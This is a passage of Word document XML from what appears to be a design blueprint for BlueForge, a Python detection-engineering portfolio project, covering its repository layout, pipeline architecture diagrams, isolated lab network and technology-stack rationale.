      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  docs/                     This blueprint + guides, playbooks, templates</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    diagrams-source (../diagrams)   Mermaid sources for architecture/data-flow/network</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    templates/             Reusable templates (detection, playbook, lab, lessons)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  diagrams/                 Mermaid: architecture, data-flow, network, component</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  labs/                     Reproducible attack/detection labs + Wazuh docker lab</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  examples/                 Small synthetic sample logs (used by tests and demos)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  tests/                    pytest suite</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  scripts/                  validate_detections.py, attack_coverage.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  screenshots/              Portfolio evidence (lab runs, alerts, dashboards)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="X978ca62f3461b53f889bdaaa3c3043347a71cf6"/>
      <w:r>
        <w:t xml:space="preserve">Why split</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src/blueforge/detections/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(code) from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detections/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(content)?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because they change for different reasons and by different skills. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">engine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is Python that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rarely changes. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are security content you add to constantly. Keeping content out of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the package means you can browse, diff, and review detections on GitHub like the security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifacts they are, and a non-Python reviewer can still read them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="why-src-layout-instead-of-a-flat-package"/>
      <w:r>
        <w:t xml:space="preserve">Why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layout instead of a flat package?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33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layout forces you to install the package to import it, which catches "works on my</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">machine because of the current directory" bugs and matches how the code runs in CI and for a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">real user. It is the current Python packaging best practice.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X17854dacb4fbc369f8fdad7906fbc53e6866075"/>
      <w:r>
        <w:t xml:space="preserve">03. Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="high-level-architecture"/>
      <w:r>
        <w:t xml:space="preserve">High-level architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BlueForge is a linear pipeline with two clearly separated halves: an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">infrastructure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">half</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(the lab and Wazuh that produce logs) and a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">half (the Python that processes them).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The Microsoft stack is an optional parallel track for Sentinel/KQL parity.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LAB["Lab (isolated VMs)"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        WIN["Windows + Sysmon"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIN["Ubuntu / Kali"]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COLLECT["Collection"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        WZ["Wazuh manager + agents"]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BF["BlueForge (Python)"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        COL["Collectors"] --&gt; NORM["Normalizer"] --&gt; ENG["Detection engine"] --&gt; ENR["Enrichment"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ENR --&gt; REP["Reporting"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ENR --&gt; HUNT["Hunting"]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CLOUD["Microsoft (optional)"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        SENT["Sentinel / Defender XDR"]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WIN --&gt; WZ --&gt; COL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    LIN --&gt; WZ</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ENG -. parity .-&gt; SENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why a pipeline and not something fancier: a pipeline is the honest shape of the problem (data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">moves one direction, stage by stage), and it is the easiest thing to explain and test. Each stage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">has a single responsibility and a typed interface (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), so any stage can be replaced without</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">touching the others.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="component-diagram"/>
      <w:r>
        <w:t xml:space="preserve">Component diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36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CLI["cli.py"] --&gt; COLL["collectors/"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    CLI --&gt; NORM["normalizer/"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    CLI --&gt; DET["detections/engine.py"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    CLI --&gt; REP["reporting/"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    COLL --&gt; SCH["schema.py (Event)"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    NORM --&gt; SCH</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    DET --&gt; SCH</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ENR["enrichment/"] --&gt; SCH</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    REP --&gt; DET</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    REP --&gt; ENR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Everything points at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">schema.Event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. That is intentional: the schema is the contract, and it is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the one file you should read first to understand the whole system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="data-flow-one-event-end-to-end"/>
      <w:r>
        <w:t xml:space="preserve">Data flow (one event, end to end)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37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A["Raw log"] --&gt; B["Collector -&gt; dict"] --&gt; C["Normalizer -&gt; Event"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    C --&gt; D{"Detection engine: match?"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    D -- no --&gt; E["Archive"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    D -- yes --&gt; F["Enrichment (IOC + intel)"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    F --&gt; G["Incident report"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    F --&gt; H["Timeline / hunt"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="network-diagram-lab"/>
      <w:r>
        <w:t xml:space="preserve">Network diagram (lab)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38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NET["Host-only 192.168.56.0/24"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        WZ["Wazuh 192.168.56.20"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        WIN["Windows+Sysmon 192.168.56.30"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        KALI["Kali 192.168.56.40"]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KALI --&gt;|attacks| WIN --&gt;|agent events| WZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The lab uses a host-only network so simulated attacks never touch the real network or the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">internet. This is a deliberate safety and containment decision, and a good thing to say out loud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in an interview: you understand blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="X20bc9361690c3d336e2c02c1f6eb5a3fc885286"/>
      <w:r>
        <w:t xml:space="preserve">Why each component exists, alternatives, trade-offs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Collectors.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exist because acquiring data is a distinct job from understanding it. Alternative:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have each parser read files directly. Rejected because it couples detection code to file formats.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trade-off: one extra layer, but adding a log source becomes trivial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Normalizer + common schema.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The heart of the design. Alternative: write detections per log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">format. Rejected because it multiplies rule maintenance by the number of formats. Trade-off: you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">must design the schema up front and maintain mappers, but you write each detection once. This is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exactly what Elastic (ECS) and Sentinel (ASIM) do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Detection engine (custom mini-Sigma).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exists so you can explain precisely how a rule fires.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Alternative: use the full</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pySigma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">library. Rejected for now because a black box you cannot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">explain is worthless in an interview; the custom engine is ~120 lines and covers the common</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">operators. Trade-off: it supports a subset of Sigma, not the whole spec. Documented as such, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the real Sigma files remain valid for use with pySigma later.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Enrichment.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exists because an alert without context is just noise. Threat-intel calls are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">optional and degrade gracefully (no API key = "unknown"), so the core runs offline and tests stay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deterministic. Alternative: block on live lookups. Rejected because it makes the tool fragile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exists because an analyst's real deliverable is a clear write-up. Markdown was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chosen because it renders on GitHub, pastes into a ticket, and converts to PDF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh as the SIEM core.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chosen because it is free, realistic, runs on the existing VMs, maps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rules to MITRE natively, and gives genuine enterprise-tool experience. Alternative: Elastic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Security or Splunk Free. Wazuh wins on ease of self-hosting and MITRE mapping. Trade-off: less</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">market share than Splunk, mitigated by the Sentinel/KQL parity track.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Sentinel parity (optional track).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exists to align with SC-200 and the Canadian</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Microsoft-heavy market. Kept optional because it needs an Azure subscription. Trade-off: cost and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trial limits, so it is a Phase 4+ concern, not a dependency of the core.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0" w:name="X26766cac72c6428677ba3d84c70429aadc7b7d4"/>
      <w:r>
        <w:t xml:space="preserve">04. Technology Stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every choice below is optimized for one thing: that Ravi can understand it and defend it in an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">interview. Nothing is included because it is trendy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="language-python-310"/>
      <w:r>
        <w:t xml:space="preserve">Language: Python 3.10+</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why: it is the SOC automation lingua franca, it is what Ravi is already learning, and it reads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">close to pseudocode so the whole codebase stays explainable. Why not Go or Rust: faster at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">runtime, but slower to write, less common in SOC tooling, and a worse fit for a beginner-to-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">intermediate author. Why 3.10+: modern type hints (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X | None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) that make the code self-documenting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="core-libraries-kept-small-on-purpose"/>
      <w:r>
        <w:t xml:space="preserve">Core libraries (kept small on purpose)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this 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pydantic v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Validate the</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Event</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">schema and config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Industry standard, great errors, fast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PyYAML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Load Sigma rules and config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sigma is YAML; ubiquitous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click</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Build the CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Simplest way to a clean, documented CLI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rich</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Readable tables and logs in the terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Makes demos and screenshots look professional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jinja2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Render incident report templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Standard templating; separates format from logic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requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Threat-intel HTTP calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The most widely understood HTTP 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python-evtx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
